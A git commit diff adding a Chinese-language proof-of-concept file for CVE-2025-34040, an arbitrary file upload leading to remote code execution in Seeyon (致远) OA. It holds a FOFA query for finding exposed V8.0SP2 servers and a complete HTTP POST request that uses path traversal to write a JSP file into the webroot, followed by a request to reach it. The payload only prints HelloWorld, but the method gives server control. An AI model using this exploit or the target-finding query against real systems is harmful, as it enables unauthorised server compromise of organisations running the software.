Update 致远OA存在文件上传导致RCE(CVE-2025-34040).md

2025-11-04 18:06:34 +00:00 · 2025-09-01 16:11:20 +08:00 · 2025-09-01 16:11:20 +08:00 · 3462196bb8
commit 3462196bb8
parent 1ed8db136a
1 changed files with 29 additions and 0 deletions
--- a/wpoc/致远OA/致远OA存在文件上传导致RCE(CVE-2025-34040).md
+++ b/wpoc/致远OA/致远OA存在文件上传导致RCE(CVE-2025-34040).md
@ -1 +1,30 @@
+# 致远OA存在文件上传导致RCE(CVE-2025-34040)

+致远oa存在任意文件上传漏洞，可以获取服务器权限
+
+## fofa
+
+```javascript
+app="致远互联-OA" && title="V8.0SP2"
+```
+
+## poc
+
+```javascript
+POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
+Accept-Encoding: gzip
+
+--59229605f98b8cf290a7b8908b34616b
+Content-Disposition: form-data; name="upload"; filename="123.xls"
+Content-Type: application/vnd.ms-excel
+
+<% out.println("HelloWorld");%>
+--59229605f98b8cf290a7b8908b34616b--
+```
+访问地址
+```
+GET /Hello.jsp HTTP/1.1
+Host:
+```